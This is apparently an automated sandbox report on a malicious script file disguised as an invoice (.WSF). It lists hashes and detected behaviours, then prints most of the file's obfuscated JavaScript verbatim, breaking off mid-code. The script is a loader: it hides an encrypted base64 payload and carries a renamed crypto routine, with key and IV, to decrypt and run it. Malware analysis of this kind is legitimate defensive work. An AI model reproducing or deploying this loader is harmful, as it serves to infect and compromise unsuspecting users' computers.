File name: Copy of Docs 68_204 INVO.WSF
Full analysis: https://app.any.run/tasks/703e4fe7-a2f6-4e5d-b365-6b6f562daddc
Verdict: Malicious activity
Analysis date: January 18, 2020, 10:42:20
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Indicators:
MIME: text/xml
File info: XML 1.0 document, ASCII text, with very long lines, with no line terminators
MD5: 6E67786F68931599C4667F2CFEA164B9
SHA1: 9707EF2E939B8EDC87D33B0D416EDFB0F6AA70F3
SHA256: 0444FF998B75D9D53A5879087BAF542415D22271801A67B9F1D5BB851620E7BB
SSDEEP: 384:U1R5TB/kHcTbgdM0moo8WE6JH+xxKqnDmrWA2juutIm6m4:oiHwgS0mooHEPPNZAUuu0
ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS
    • Changes settings of System certificates
      • cscript.exe (PID: 3792)
    • Runs PING.EXE for delay simulation
      • cmd.exe (PID: 2240)
  • SUSPICIOUS
    • Creates files in the user directory
      • WScript.exe (PID: 716)
      • cscript.exe (PID: 2188)
      • cscript.exe (PID: 3792)
    • Executes scripts
      • cmd.exe (PID: 2632)
      • cscript.exe (PID: 2188)
    • Starts CMD.EXE for commands execution
      • WScript.exe (PID: 716)
      • cscript.exe (PID: 3792)
    • Application launched itself
      • cscript.exe (PID: 2188)
    • Adds / modifies Windows certificates
      • cscript.exe (PID: 3792)
  • INFO
    • Manual execution by user
      • explorer.exe (PID: 2488)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD: .xml | Generic XML (ASCII) (100)

EXIF / XMP

PackageJobScriptLanguage: JavaScript
PackageJobScript: var dtEDoFVfAj={eMUXrzTNkg:function(r){var a=NKBCmUHGeG.eazSwMHLnL.bOuFgvcTJj.xrkoWLGoQF({ukAoslEzPa:NKBCmUHGeG.VmLLEtCkRa.qdaKtPbCGD.eMUXrzTNkg("hXrI6VHc1882GaQ1AuutGmhjD5uM0PJiojBtfmfm and l0o784XktSXA4ufoMIOcfhacZ6B and 43ZP2g7i9omx9jRoxkaz3 are dSBNiJzm and dGnZI2r53FQQKnVV9JrIg4y are YHpuvZj5PGIf60zbJulqkLTkXa0Pi0g7f are zxB7TadXzr5z are niyD and Jd are SSiyKH2Y8M651YAdyRQ are SS7BkvzQY are G58nkmR are dRTGI15uZRkrDGJRKQbgxzG769QTL and A3awUdbMM92WCAVsvs1wfbJSkeNQpIaRHfQ479NujDAZKphWRO1cBULK73MONz are QztuL4InpAGRoAuuQ and 7W are are JKc1AwSwWB and JsLXxscVU6I6sDdvXWEpdER3yT9rn56VPTP37UC9Cfnfp9 and MC are QhXwArcEsxD1Xciv0T are 4CO and A1Mkkz1X8ccgdphF49tmsNm5vwP and F0RDAtlxs2PiY6H48ByJL5JFxsWFrXYzvPKGnUfLBffqm8ls3ZF5eljwVMB are bdql1i4f1hKV2OHqbxUA2CX5lKknoW4KdiftLHQZj2G2VTIyICK26i8Z and PJP1nmWw and T3D1gW and q7ycOz1mkI3 and F5zzLDc5EKgm3 and WoOaSei0KmzUpta6ldqoMx are d are D9 are nxlhHEHMewhYHlIw31WBUoDceiK8s413 and ccjnnpWtY6xleiMDJf8ovDhtjJyke3a1HNQYk0V8EjmfjHf are dzdcVxCB1QtVwiRvZvlCkMbLSt38Wwl4u are CRVMePBkVTXZ5s69 are vds4LTA0Aw4oVbNGBfZVqVo4wSwGyhSBoJEPm7255WpszOJ7SHBL9wZUCcYQzmLZpCDaNPTZLWAxa12OvEq2s11GcBIY28ttIHCSLdPhXEaGZZCiqM3XqbxQFkwAo are VD are jGTPtbjiDQGL and ZOqqPqzrGQGMFMwgVP are Avh and HekAaeWy1oq13PeM4sAyPovc4EPmhWErfVLSI2c8rilBAo9YeyGDwkAORVUGGe2UlUok are 2cAtJddwiW9tzIFWUu4t3gDUSWKjBDXwAJfcdbOVYDWj and KLNaPOx are lwJuy3UY9epmM1IfHbw59iibQZUYCHrJ5uWJAXhOWEtYtcJY1tf are qKR1aHaBapaX2umb0M6IXEPH2RFMmwcnuqC4Pu4owez25O8BZw5YCyq0pJSTH and t are k9aZonogWXx160PGgxC are ZjWCTjT8w5MBYf6Q6KHDrSQXwSLWvkCO9h5LuzZ1l4hOyoQ3k4IAcZ0p2acc4 and TJpShsBKIyXRo3vHmZJgZusOKnjMp5KnRiV977EpWu5DO04U and 7zWLYVPzGNm9cfsVrjpdXz6Skh4kJZ1a2hWbsQlFudse6x9t0KBd4PGcm4yri7IthM are CjBtJRCW3d0CmYoi8zhX are vszXndxds5 and UitIjtz57cEWJeYvOD and UaO1xfj and csD77yvaVDl5Bmai and 1J4YcQHmWHp0uzJxaV9i4ynKSWfdtW are 9yfSJhXpL are DRgYoC8yxRnqjqzqWCisyEULaImc9RkGg6mmReVEj2AbCTxcTostc are gBm are gsDWmpizifhK9WvSGbI7eTCoZ and 
S5OXEU3W9V1jnEUYCk4qVP3QuxAS70YZwbovrSkn0 and XARuvNTCbHpnhCD8hw7RYq552EpZCp3rQGyVlFfxc257U7rHF0PTqMOd are 5DwPkabGT and VgW and xncxz21Cj7wVHC73vlzqvV are PI1kGlPT are HaFaFLV4qutNvtielCQkZbGuFRBAXxA1Z3A1u2tuYrpCtISB68j2TtbFbxQnzGvr are vEKW are ejhfUcZ1CsRZRAmYAWl0dcYPsp8XKAhNZWJ are gzZPAjyxcL3nriE97oNhod4aOdNbTfNUKe3CphYnsdGdbGuWj0ruWVOh5egU8GL and MNdelWRFC0PczuJ9OFKpFyYDTbuvCwTEZLXb3ltKNU9mh4AHeuZb7vO6XOfevqnEgVNcWBmwgM1JDEnb and atz96zBvtYwKVTCcDTndnKayXO and lc82uRCy4lNm6YagZ9AsgsPdq1eqBIpxIQ8juHCVivA5PHtP2tidi and S3ezdj37qnjwqOrwnVTzNvZwvl4DL3B6yeepbyqD and p7grOkWHAS7mhC and eeDv895PEt6FGMntgKvjlbwBa423LLmDv74Ix7NRcCct68SGfkChXKoYck3dMozwB8Ss3fJ2FmhaiO5GttqihfWq9NR3SRusXCAiSh5uK3okEXrtmm04ZUH8ldOTKd28EkhPvSmg7r are lBCPKt6O and k5mgs4eiqeVb0KxeFczXBCRi89CPNutFH1yK86 are H0bdXyKZoIXtbec4evOybGVqh028kw5nxrxIUcLVweByg are VN12HhUOR5cqaU0VdQRKFEZ are 7mlIAxdxywORzGlC4GLaC4ikdpMQa23 and 6vKXaZF24NqKEJ1VdKK6medjdeaqjcZkjOr7oVf4V6OocG1WIpevZMJvWX5ZsEJd94ZviwVKOvqLUocAtmBaZeO5rQM1TtLz4wG and t and vIRJkjxaja2dDQ5KyhWKlDo3TbdhZ7AT0NnZF0FPnq3RcgUvAUrzvuRuvJKBVZ6v2h are b21OGY and yLWLxIi9Ka5S9oOt and and dkZQZmNcoFM4BuGaPS3efXa6PEGd0jGjZKF5TDOMO1dePbDtoGkdy8Z6tfzuGIC3SH9hl7EbcTSAkvns7d3jcru8 and igPxkapNqIr2s7Qv3Qt8hpJeMBwx1ILC1I are rC7fjBR1wYv7lsBJov8kL03A5jDoyZvEouf2V and fzHMLXmAuGb and R6MnuyUUBOppM36jESTcfPNYjx and NlidUMIn8ijozFytVfkt4wAsq90MbAlcso2y9D are EpiArc2N708N14qL5 are pPRCJb6UpRUJn1MI38DE1hjgzWlIeyvcPwvTWbqGubBJP6DIQJ9Avy are nvijYBfPAuXIkH4IS and 0yPyFcdt are fswfPqt2E4DKqhCm5kNVMF4BThsNauwzeSS2lxEr and PWu7MvY9M3wuGvj3EW0yZq5CM3Gm6R7gl9 are bST are IyhGwDM4bqFN0bqGgeqlgJzQqFFPA and wnQ1Km0EFUYW0biVj4anSrDd3JWtJ are and NZcCeL5MXfHX8lBEQLquksAq and fBxCBoGht11mZN4sJX5o9CTROWZLgH67WxukBYJeykngNcO1rpRSFsJ5w2Zw5GK8nfLKF3tdzig3X7HMPdbgx75azouagQmGcHaE are QItF0z2JYxfOjdhQPmElhBsdXtTxfplPb8Cts02gafq7KExoSPK991ca1LVwKnqY8hSRL7Ox are EmO2c1epWsKEoj6DcA are 3jZ0GOmDRGSWZLXJWu4ytMXc5itOKFpfwzUlGuHKdDx are 
YDfz3gDfhgp3jYZlatnlzYtvm1DTw43dLHx2UAxm8CCE1Ek1vUExdKtjQrIM2BWjjzd0Mw81CxLr4zjsGjv4axtCU22jWCM1PfWPygVzx02zxEewGzmz7E0qbeQm6CQrn337r279rPhBYd0i1uX1ewzKJOEuETA3pPBIw2gJyHneZ3qSUOydPRCDtQ3E59idpW and XYO9LskAb8GIRBfRfFCmxrn1yTODUyoNiFE01 are MiFbaXzmJlQxHwmhE9UbAMx are BNF0c1yEPphQu39labdWbf5WoswYtqvwOQlEUxugSXDIh3McCOgD3hALEgrJZ9nrM01oOxnw88cA31LZpkmeDjYCMR and XOzWLRQ6fXReP and wZ4u are and ps7GYfltz2kiEmfq2zzg2bNsH and Mwa7tnyNrKK9Pqc are bsQyqg3H3AAEB6AtGfk1 are vnI3dDrlxEI89T3fgpH4cEmym0rEFPSF77bNk9 are yjNRoc0PlD8Y28T8sxkYhmOMVPm5BgVk6hYKYkhARJYNJ0mGGwOdDsqJ1 and P8CyHDuRehNfZWsGzG and Eqr8Hy4fZMfqt are jUr7lyxbEfVpbJFVLgrOZbnec are hZ and adj6XSZs3Lupb7bTcZYTlfL8yD6SBSUD1mf8ILWoZz7Wl and MCPLMzsHuK4C5sV1IYWES76atP5dzfbREIMPZc6ZBce3Eud4MQdxuZ789BVn0q5YCfLybs are p0sDE31PLbROC25LBlIZaJGNacqL9A0Nb2iyEWTmwrxclBOrMwMnISCh2WVQ3foO4q1mRqQ0l6HrhYLe5oVnqb7aVTt7jNWHYbgqAgNdG6mrACztTrNzonc65poVjP5mj7B4vmLT are qZinSukistDRUngoi4eGrVRKOxlB92jJjeRBw14btD1WM are Xl0u3wsVONebFdGBJ6Chro60Ynoc are BarDNsIPtNiP4MJE0TsxINOpoI9ZYbgjgI2PfDsrPyEibFAQxRnWrR7EIeb and Le5S45ic948npMHeHwbVC7ZIogPSRYm are 5o0crU5Zg2EK2XzN5NzfjWyKOvzzaGwqMGJjo5GkpuhGpHjR0zuaXW are 6A3J3tUKDSG9 are 2 and 870Ycg9ghgVBgWCJBFYuAN74BJgZEVk4Db3jUUhz4vEkyCIR6dEjaCXpNa1kugicsogD4U2Qu49SnrsAUKbpyshyBIm6kc2r4dU4SxQAwFBuRinrqUMbgYFAm8leGfi6O3StOy84czlNpyGxzQByMLwYIRhp6tb0OY9oBbdOQS and 8i4G and v70kkWCBDqRsmBFIz4iVe5HcwAaabiU6Fl8RKlJvGUfiv3zStwFqXvctpcq63cfgCbYpQJuU and eoTTdl and DuKNrQkm9zD0zxBpB18eLeQnIKA are and tFmMIiID6JPtEeJQPlfcIj5z1CvBS794ssrrTng97G and BYMQMF5Atblixch9pQPNxyVKqBt4q8TPEZo and YXwN7M6L70O8UarPXLue8JurQ7U9ccn5 and pZT and 2rx6tdVG0oqo1zhAfVexenrWasd9hhPnTyKEbc1TDXVboJCs5VbRxbOTIO45UDtz are 97 and Fs95mp9OwL6wTebE0P8 and L2vVnjWftpBmNIc1pFZGNrAgBmAZL7qpayzF6sS34rqJenJnyVigYTcgbbqMtjs1TZWzIsoniMXuCBs9sH2R5YE0O8B0t8zEu27hmF are BdgTEWs3ufga2PmeuGZBJvt1pPVjdkHUZ56TiRBjTzhic are Mv5WmwjBogQ4Gi and kRCYULmBRnZ and aSSXbXA9T9B0NfgU2VFMJWbFFAwhonZL9J34K0btsmR are Seuv8 and 
I3J6oxsfyH3gX09fyaVzzktwVqUJWe4jesChFC5youtY6X and 7AHeHm87dHdWzVGJb52Kn2q1qi2jRQv74ggK84jfvd0batVJEIvwAyYnE0tWMdlgZj and 8HH3 and ziJOq4pYG".replace(/\sand\s/g,"+").replace(/\sare\s/g,"/"))});return a.yLIlTYUEdC=NKBCmUHGeG.VmLLEtCkRa.lDGQhhAcvH.eMUXrzTNkg("\x35\x36\x33\x66\x64\x62\x35\x37\x66\x65\x62\x61\x30\x38\x33\x39\x31\x37\x35\x65\x65\x31\x65\x62\x62\x33\x33\x64\x63\x34\x62\x65"),a.gwiUkDQFxZ=NKBCmUHGeG.VmLLEtCkRa.lDGQhhAcvH.eMUXrzTNkg("\x36\x30\x34\x37\x61\x37\x62\x38\x65\x32\x30\x66\x39\x37\x30\x37"),a}},NKBCmUHGeG=NKBCmUHGeG||function(s){function v(){}var r={},a=r.eazSwMHLnL={},t=a.PWMbKrXNBt={LBLCJIeRxa:function(r){v.prototype=this;var a=new v;return r&&a.GYRmHplwNA(r),a.hasOwnProperty("VTADyRvtZq")||(a.VTADyRvtZq=function(){a.$super.VTADyRvtZq.apply(this,arguments)}),(a.VTADyRvtZq.prototype=a).$super=this,a},xrkoWLGoQF:function(){var r=this.LBLCJIeRxa();return r.VTADyRvtZq.apply(r,arguments),r},VTADyRvtZq:function(){},GYRmHplwNA:function(r){for(var a in r)r.hasOwnProperty(a)&&(this[a]=r[a]);r.hasOwnProperty("toString")&&(this.toString=r.toString)},CUrjqyrzhF:function(){return this.VTADyRvtZq.prototype.LBLCJIeRxa(this)}},u=a.KVwhYRmAAZ=t.LBLCJIeRxa({VTADyRvtZq:function(r,a){r=this.eZRNeHSVmZ=r||[],this.KlwuiHJXBf=null!=a?a:4*r.length},toString:function(r){return(r||i).BmCiUFCvRY(this)},SYgJPZTcjh:function(r){var a=this.eZRNeHSVmZ,v=r.eZRNeHSVmZ,t=this.KlwuiHJXBf;if(r=r.KlwuiHJXBf,this.PFqgzhjvEl(),t%4)for(var n=0;n<r;n++)a[t+n>>>2]|=(v[n>>>2]>>>24-n%4*8&255)<<24-(t+n)%4*8;else if(65535<v.length)for(n=0;n<r;n+=4)a[t+n>>>2]=v[n>>>2];else a.push.apply(a,v);return this.KlwuiHJXBf+=r,this},PFqgzhjvEl:function(){var r=this.eZRNeHSVmZ,a=this.KlwuiHJXBf;r[a>>>2]&=4294967295<<32-a%4*8,r.length=s.ceil(a/4)},CUrjqyrzhF:function(){var r=t.CUrjqyrzhF.call(this);return r.eZRNeHSVmZ=this.eZRNeHSVmZ.slice(0),r},CqlccWGqHP:function(r){for(var a=[],v=0;v<r;v+=4)a.push(4294967296*s.CqlccWGqHP()|0);return new 
u.VTADyRvtZq(a,r)}}),n=r.VmLLEtCkRa={},i=n.lDGQhhAcvH={BmCiUFCvRY:function(r){var a=r.eZRNeHSVmZ;r=r.KlwuiHJXBf;for(var v=[],t=0;t<r;t++){var n=a[t>>>2]>>>24-t%4*8&255;v.push((n>>>4).toString(16)),v.push((15&n).toString(16))}return v.join("")},eMUXrzTNkg:function(r){for(var a=r.length,v=[],t=0;t<a;t+=2)v[t>>>3]|=parseInt(r.substr(t,2),16)<<24-t%8*4;return new u.VTADyRvtZq(v,a/2)}},o=n.WfDUQhNjUK={BmCiUFCvRY:function(r){var a=r.eZRNeHSVmZ;r=r.KlwuiHJXBf;for(var v=[],t=0;t<r;t++)v.push(String.fromCharCode(a[t>>>2]>>>24-t%4*8&255));return v.join("")},eMUXrzTNkg:function(r){for(var a=r.length,v=[],t=0;t<a;t++)v[t>>>2]|=(255&r.charCodeAt(t))<<24-t%4*8;return new u.VTADyRvtZq(v,a)}},h=n.IBEHHawlRa={BmCiUFCvRY:function(r){try{return decodeURIComponent(escape(o.BmCiUFCvRY(r)))}catch(r){throw Error("Malformed UTF-8 data")}},eMUXrzTNkg:function(r){return o.eMUXrzTNkg(unescape(encodeURIComponent(r)))}},e=a.UlEVySMEJs=t.LBLCJIeRxa({FHfjEzPpJw:function(){this.vIeNauyfgj=new u.VTADyRvtZq,this.GESeKdKkDW=0},gyZqefjfbb:function(r){"string"==typeof r&&(r=h.eMUXrzTNkg(r)),this.vIeNauyfgj.SYgJPZTcjh(r),this.GESeKdKkDW+=r.KlwuiHJXBf},RKIgZniAQd:function(r){var a=this.vIeNauyfgj,v=a.eZRNeHSVmZ,t=a.KlwuiHJXBf,n=this.xWmTEJzxuk,i=t/(4*n);if(r=(i=r?s.ceil(i):s.max((0|i)-this.jreIRpNpkc,0))*n,t=s.min(4*r,t),r){for(var o=0;o<r;o+=n)this.UhGEEtisBv(v,o);o=v.splice(0,r),a.KlwuiHJXBf-=t}return new u.VTADyRvtZq(o,t)},CUrjqyrzhF:function(){var r=t.CUrjqyrzhF.call(this);return r.vIeNauyfgj=this.vIeNauyfgj.CUrjqyrzhF(),r},jreIRpNpkc:0});a.bNRyvxysqf=e.LBLCJIeRxa({tAjRFOtDJa:t.LBLCJIeRxa(),VTADyRvtZq:function(r){this.tAjRFOtDJa=this.tAjRFOtDJa.LBLCJIeRxa(r),this.FHfjEzPpJw()},FHfjEzPpJw:function(){e.FHfjEzPpJw.call(this),this.VDrUSIMlYF()},xizcXRaCSF:function(r){return this.gyZqefjfbb(r),this.RKIgZniAQd(),this},fZuooDWaQu:function(r){return r&&this.gyZqefjfbb(r),this.jnfmItvFqw()},xWmTEJzxuk:16,bvTMfLRMFS:function(v){return function(r,a){return new 
v.VTADyRvtZq(a).fZuooDWaQu(r)}},FdkaCDLqCX:function(v){return function(r,a){return new c.HMAC.VTADyRvtZq(v,a).fZuooDWaQu(r)}}});var c=r.RfuCsvEMIV={};return r}(Math);!function(){var r=NKBCmUHGeG,u=r.eazSwMHLnL.KVwhYRmAAZ;r.VmLLEtCkRa.qdaKtPbCGD={BmCiUFCvRY:function(r){var a=r.eZRNeHSVmZ,v=r.KlwuiHJXBf,t=this.KraWJNWdbF;r.PFqgzhjvEl(),r=[];for(var n=0;n<v;n+=3)for(var i=(a[n>>>2]>>>24-n%4*8&255)<<16|(a[n+1>>>2]>>>24-(n+1)%4*8&255)<<8|a[n+2>>>2]>>>24-(n+2)%4*8&255,o=0;o<4&&n+.75*o<v;o++)r.push(t.charAt(i>>>6*(3-o)&63));if(a=t.charAt(64))for(;r.length%4;)r.push(a);return r.join("")},eMUXrzTNkg:function(r){var a=r.length,v=this.KraWJNWdbF;!(t=v.charAt(64))||-1!=(t=r.indexOf(t))&&(a=t);for(var t=[],n=0,i=0;i<a;i++)if(i%4){var o=v.indexOf(r.charAt(i-1))<<i%4*2,s=v.indexOf(r.charAt(i))>>>6-i%4*2;t[n>>>2]|=(o|s)<<24-n%4*8,n++}return u.xrkoWLGoQF(t,n)},KraWJNWdbF:"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="}}(),function(i){function m(r,a,v,t,n,i,o){return((r=r+(a&v|~a&t)+n+o)<<i|r>>>32-i)+a}function A(r,a,v,t,n,i,o){return((r=r+(a&t|v&~t)+n+o)<<i|r>>>32-i)+a}function C(r,a,v,t,n,i,o){return((r=r+(a^v^t)+n+o)<<i|r>>>32-i)+a}function O(r,a,v,t,n,i,o){return((r=r+(v^(a|~t))+n+o)<<i|r>>>32-i)+a}for(var r=NKBCmUHGeG,a=(t=r.eazSwMHLnL).KVwhYRmAAZ,v=t.bNRyvxysqf,t=r.RfuCsvEMIV,M=[],n=0;n<64;n++)M[n]=4294967296*i.abs(i.sin(n+1))|0;t=t.lLteiQqIHF=v.LBLCJIeRxa({VDrUSIMlYF:function(){this.eSduUVnIBD=new a.VTADyRvtZq([1732584193,4023233417,2562383102,271733878])},UhGEEtisBv:function(r,a){for(var v=0;v<16;v++){var t=r[o=a+v];r[o]=16711935&(t<<8|t>>>24)|4278255360&(t<<24|t>>>8)}v=this.eSduUVnIBD.eZRNeHSVmZ;var 
n,i,o=r[a+0],s=(t=r[a+1],r[a+2]),u=r[a+3],h=r[a+4],e=r[a+5],c=r[a+6],f=r[a+7],l=r[a+8],p=r[a+9],g=r[a+10],d=r[a+11],k=r[a+12],y=r[a+13],w=r[a+14],S=r[a+15],_=v[0],B=O(B=O(B=O(B=O(B=C(B=C(B=C(B=C(B=A(B=A(B=A(B=A(B=m(B=m(B=m(B=m(B=v[1],i=m(i=v[2],n=m(n=v[3],_=m(_,B,i,n,o,7,M[0]),B,i,t,12,M[1]),_,B,s,17,M[2]),n,_,u,22,M[3]),i=m(i,n=m(n,_=m(_,B,i,n,h,7,M[4]),B,i,e,12,M[5]),_,B,c,17,M[6]),n,_,f,22,M[7]),i=m(i,n=m(n,_=m(_,B,i,n,l,7,M[8]),B,i,p,12,M[9]),_,B,g,17,M[10]),n,_,d,22,M[11]),i=m(i,n=m(n,_=m(_,B,i,n,k,7,M[12]),B,i,y,12,M[13]),_,B,w,17,M[14]),n,_,S,22,M[15]),i=A(i,n=A(n,_=A(_,B,i,n,t,5,M[16]),B,i,c,9,M[17]),_,B,d,14,M[18]),n,_,o,20,M[19]),i=A(i,n=A(n,_=A(_,B,i,n,e,5,M[20]),B,i,g,9,M[21]),_,B,S,14,M[22]),n,_,h,20,M[23]),i=A(i,n=A(n,_=A(_,B,i,n,p,5,M[24]),B,i,w,9,M[25]),_,B,u,14,M[26]),n,_,l,20,M[27]),i=A(i,n=A(n,_=A(_,B,i,n,y,5,M[28]),B,i,s,9,M[29]),_,B,f,14,M[30]),n,_,k,20,M[31]),i=C(i,n=C(n,_=C(_,B,i,n,e,4,M[32]),B,i,l,11,M[33]),_,B,d,16,M[34]),n,_,w,23,M[35]),i=C(i,n=C(n,_=C(_,B,i,n,t,4,M[36]),B,i,h,11,M[37]),_,B,f,16,M[38]),n,_,g,23,M[39]),i=C(i,n=C(n,_=C(_,B,i,n,y,4,M[40]),B,i,o,11,M[41]),_,B,u,16,M[42]),n,_,c,23,M[43]),i=C(i,n=C(n,_=C(_,B,i,n,p,4,M[44]),B,i,k,11,M[45]),_,B,S,16,M[46]),n,_,s,23,M[47]),i=O(i,n=O(n,_=O(_,B,i,n,o,6,M[48]),B,i,f,10,M[49]),_,B,w,15,M[50]),n,_,e,21,M[51]),i=O(i,n=O(n,_=O(_,B,i,n,k,6,M[52]),B,i,u,10,M[53]),_,B,g,15,M[54]),n,_,t,21,M[55]),i=O(i,n=O(n,_=O(_,B,i,n,l,6,M[56]),B,i,S,10,M[57]),_,B,c,15,M[58]),n,_,y,21,M[59]),i=O(i,n=O(n,_=O(_,B,i,n,h,6,M[60]),B,i,d,10,M[61]),_,B,s,15,M[62]),n,_,p,21,M[63]);v[0]=v[0]+_|0,v[1]=v[1]+B|0,v[2]=v[2]+i|0,v[3]=v[3]+n|0},jnfmItvFqw:function(){var r=this.vIeNauyfgj,a=r.eZRNeHSVmZ,v=8*this.GESeKdKkDW,t=8*r.KlwuiHJXBf;a[t>>>5]|=128<<24-t%32;var 
n=i.floor(v/4294967296);for(a[15+(t+64>>>9<<4)]=16711935&(n<<8|n>>>24)|4278255360&(n<<24|n>>>8),a[14+(t+64>>>9<<4)]=16711935&(v<<8|v>>>24)|4278255360&(v<<24|v>>>8),r.KlwuiHJXBf=4*(a.length+1),this.RKIgZniAQd(),a=(r=this.eSduUVnIBD).eZRNeHSVmZ,v=0;v<4;v++)t=a[v],a[v]=16711935&(t<<8|t>>>24)|4278255360&(t<<24|t>>>8);return r},CUrjqyrzhF:function(){var r=v.CUrjqyrzhF.call(this);return r.eSduUVnIBD=this.eSduUVnIBD.CUrjqyrzhF(),r}}),r.lLteiQqIHF=v.bvTMfLRMFS(t),r.HmaclLteiQqIHF=v.FdkaCDLqCX(t)}(Math),function(){var r,a=NKBCmUHGeG,v=(r=a.eazSwMHLnL).PWMbKrXNBt,h=r.KVwhYRmAAZ,t=(r=a.RfuCsvEMIV).clGbCUkVRF=v.LBLCJIeRxa({tAjRFOtDJa:v.LBLCJIeRxa({KzfiCbrnue:4,qwYZePKuGS:r.lLteiQqIHF,qqfapNqQKP:1}),VTADyRvtZq:function(r){this.tAjRFOtDJa=this.tAjRFOtDJa.LBLCJIeRxa(r)},IOaZMzuUuc:function(r,a){for(var v=(o=this.tAjRFOtDJa).qwYZePKuGS.xrkoWLGoQF(),t=h.xrkoWLGoQF(),n=t.eZRNeHSVmZ,i=o.KzfiCbrnue,o=o.qqfapNqQKP;n.length<i;){s&&v.xizcXRaCSF(s);var s=v.xizcXRaCSF(r).fZuooDWaQu(a);v.FHfjEzPpJw();for(var u=1;u<o;u++)s=v.fZuooDWaQu(s),v.FHfjEzPpJw();t.SYgJPZTcjh(s)}return t.KlwuiHJXBf=4*i,t}});a.clGbCUkVRF=function(r,a,v){return t.xrkoWLGoQF(v).IOaZMzuUuc(r,a)}}(),NKBCmUHGeG.eazSwMHLnL.SQaxnzYskL||function(){var r=(f=NKBCmUHGeG).eazSwMHLnL,a=r.PWMbKrXNBt,o=r.KVwhYRmAAZ,v=r.UlEVySMEJs,t=f.VmLLEtCkRa.qdaKtPbCGD,n=f.RfuCsvEMIV.clGbCUkVRF,i=r.SQaxnzYskL=v.LBLCJIeRxa({tAjRFOtDJa:a.LBLCJIeRxa(),DFaQKSSpxd:function(r,a){return this.xrkoWLGoQF(this.XNQsMuyROa,r,a)},YTPIvGNUof:function(r,a){return this.xrkoWLGoQF(this.puxhpNLqoe,r,a)},VTADyRvtZq:function(r,a,v){this.tAjRFOtDJa=this.tAjRFOtDJa.LBLCJIeRxa(v),this.hLGIpQMIyO=r,this.ujgXpnylwb=a,this.FHfjEzPpJw()},FHfjEzPpJw:function(){v.FHfjEzPpJw.call(this),this.VDrUSIMlYF()},BirFVFlKOB:function(r){return this.gyZqefjfbb(r),this.RKIgZniAQd()},fZuooDWaQu:function(r){return r&&this.gyZqefjfbb(r),this.jnfmItvFqw()},KzfiCbrnue:4,XRkvWggaQX:4,XNQsMuyROa:1,puxhpNLqoe:2,bvTMfLRMFS:function(t){return{PYbsXnmtJA:function(r,a,v){return("string"==typeof 
a?l:c).PYbsXnmtJA(t,r,a,v)},IXjSHElPSb:function(r,a,v){return("string"==typeof a?l:c).IXjSHElPSb(t,r,a,v)}}}});r.StreamSQaxnzYskL=i.LBLCJIeRxa({jnfmItvFqw:function(){return this.RKIgZniAQd(!0)},xWmTEJzxuk:1});function s(r,a,v){var t=this.bQaMMvenyc;t?this.bQaMMvenyc=void 0:t=this.MAJkuGovvM;for(var n=0;n<v;n++)r[a+n]^=t[n]}var u=f.jspwHIXzmY={},h=(r.BlockSQaxnzYskLMode=a.LBLCJIeRxa({DFaQKSSpxd:function(r,a){return this.vEQkSvUxdn.xrkoWLGoQF(r,a)},YTPIvGNUof:function(r,a){return this.PtyIomnbVQ.xrkoWLGoQF(r,a)},VTADyRvtZq:function(r,a){this.GITGGidlRh=r,this.bQaMMvenyc=a}})).LBLCJIeRxa();h.vEQkSvUxdn=h.LBLCJIeRxa({BirFVFlKOBBlock:function(r,a){var v=this.GITGGidlRh,t=v.xWmTEJzxuk;s.call(this,r,a,t),v.PYbsXnmtJABlock(r,a),this.MAJkuGovvM=r.slice(a,a+t)}}),h.PtyIomnbVQ=h.LBLCJIeRxa({BirFVFlKOBBlock:function(r,a){var v=this.GITGGidlRh,t=v.xWmTEJzxuk,n=r.slice(a,a+t);v.IXjSHElPSbBlock(r,a),s.call(this,r,a,t),this.MAJkuGovvM=n}}),u=u.HoghRMehux=h,h=(f.DNsMXJjxnO={}).Pkcs7={DNsMXJjxnO:function(r,a){for(var v,t=(v=(v=4*a)-r.KlwuiHJXBf%v)<<24|v<<16|v<<8|v,n=[],i=0;i<v;i+=4)n.push(t);v=o.xrkoWLGoQF(n,v),r.SYgJPZTcjh(v)},unDNsMXJjxnO:function(r){r.KlwuiHJXBf-=255&r.eZRNeHSVmZ[r.KlwuiHJXBf-1>>>2]}},r.BlockSQaxnzYskL=i.LBLCJIeRxa({tAjRFOtDJa:i.tAjRFOtDJa.LBLCJIeRxa({jspwHIXzmY:u,ovnGHahhRt:h}),FHfjEzPpJw:function(){i.FHfjEzPpJw.call(this);var r=(a=this.tAjRFOtDJa).yLIlTYUEdC,a=a.jspwHIXzmY;if(this.hLGIpQMIyO==this.XNQsMuyROa)var v=a.DFaQKSSpxd;else v=a.YTPIvGNUof,this.jreIRpNpkc=1;this._jspwHIXzmY=v.call(a,this,r&&r.eZRNeHSVmZ)},UhGEEtisBv:function(r,a){this._jspwHIXzmY.BirFVFlKOBBlock(r,a)},jnfmItvFqw:function(){var r=this.tAjRFOtDJa.ovnGHahhRt;if(this.hLGIpQMIyO==this.XNQsMuyROa){r.DNsMXJjxnO(this.vIeNauyfgj,this.xWmTEJzxuk);var a=this.RKIgZniAQd(!0)}else a=this.RKIgZniAQd(!0),r.unDNsMXJjxnO(a);return a},xWmTEJzxuk:4});var 
e=r.bOuFgvcTJj=a.LBLCJIeRxa({VTADyRvtZq:function(r){this.GYRmHplwNA(r)},toString:function(r){return(r||this.HCvDohrvxQ).BmCiUFCvRY(this)}}),c=(u=(f.XCoXBEMuLA={}).pMgBTzEVtE={BmCiUFCvRY:function(r){var a=r.ukAoslEzPa;return((r=r.gwiUkDQFxZ)?o.xrkoWLGoQF([1398893684,1701076831]).SYgJPZTcjh(r).SYgJPZTcjh(a):a).toString(t)},eMUXrzTNkg:function(r){var a=(r=t.eMUXrzTNkg(r)).eZRNeHSVmZ;if(1398893684==a[0]&&1701076831==a[1]){var v=o.xrkoWLGoQF(a.slice(2,4));a.splice(0,4),r.KlwuiHJXBf-=16}return e.xrkoWLGoQF({ukAoslEzPa:r,salt:v})}},r.SerializableSQaxnzYskL=a.LBLCJIeRxa({tAjRFOtDJa:a.LBLCJIeRxa({XCoXBEMuLA:u}),PYbsXnmtJA:function(r,a,v,t){t=this.tAjRFOtDJa.LBLCJIeRxa(t);var n=r.DFaQKSSpxd(v,t);return 